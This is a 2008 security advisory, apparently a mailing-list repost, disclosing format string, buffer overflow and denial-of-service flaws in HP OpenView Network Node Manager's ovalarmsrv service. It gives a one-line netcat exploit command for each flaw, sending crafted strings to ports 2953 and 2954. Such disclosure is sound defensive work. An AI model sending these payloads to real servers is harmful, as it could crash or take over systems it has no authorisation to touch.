[NEWS] HP OpenView NNM Multiple Vulnerabilities
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 8 Apr 2008 08:25:15 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
HP OpenView NNM Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.openview.hp.com/products/nnm/> OpenView NNM "automates the
process of developing a hyper-accurate topology of your physical network,
virtual network services and the complex relationships between them. It
then uses that topology as the basis for intelligent root cause analysis
to enhance network availability and performance." Multiple vulnerabilities
have been discovered in HP OpenView's NNM product.
DETAILS
Vulnerable Systems:
* HP OpenView Network Node Manager version 7.53
Format string in ovalarmsrv
The ovalarmsrv.exe process listening on port 2953 is affected by a format
string vulnerability caused by the calling of ov.fprintf_new (which then
calls vsprintf) using the final message without a format argument:
"Connection Refused; Data in listener port corrupt: ATTACKER_STRING"
Exploit:
echo %n%n%s%n%n%s | nc SERVER 2953 -v -v
Multiple buffer-overflows in ovalarmsrv
The same process listens also on port 2954 where are handled some types of
requests using specific sscanf formats:
REQUEST_SEV_CHANGE (47): "%d %d %d %[^\n]"
REQUEST_SAVE_STATE (61): "%d %[^\n]s"
REQUEST_LOCAL (66): "%d"
REQUEST_RESTORE_STATE (62): "%d %s"
REQUEST_SAVE_DIR (63):
As visible by the previous format arguments there are no checks on the
length of the client string handled by the requests 47, 61 and 62 which
can be used to exploit a stack based buffer-overflow vulnerability using a
string parameter longer than 512 bytes.
Exploit:
echo 62 AAAAAAAAAAAAA...512_'A's...AAAAAAAAAAAAA | nc SERVER 2954 -v -v
Denial of service in ovalarmsrv
Another problem of the ovalarmsrv service is that it can be easily freezed
with CPU at 100% and without the possibility of handling further requests
on port 2953/2954 simply sending some invalid values.
Exploit:
echo 47 1 2 what_you_want | nc SERVER 2954 -v -v -w 1
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@xxxxxxxxxxxxx> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/ovalarmsrv-adv.txt>
http://aluigi.altervista.org/adv/ovalarmsrv-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] Orbit Downloader "Download Failed" Buffer Overflow
- Next by Date: [NEWS] Websphere MQ Security Exit Authentication Bypass Vulnerability
- Previous by thread: [NT] Orbit Downloader "Download Failed" Buffer Overflow
- Next by thread: [NEWS] Websphere MQ Security Exit Authentication Bypass Vulnerability
- Index(es):
Relevant Pages
|
|
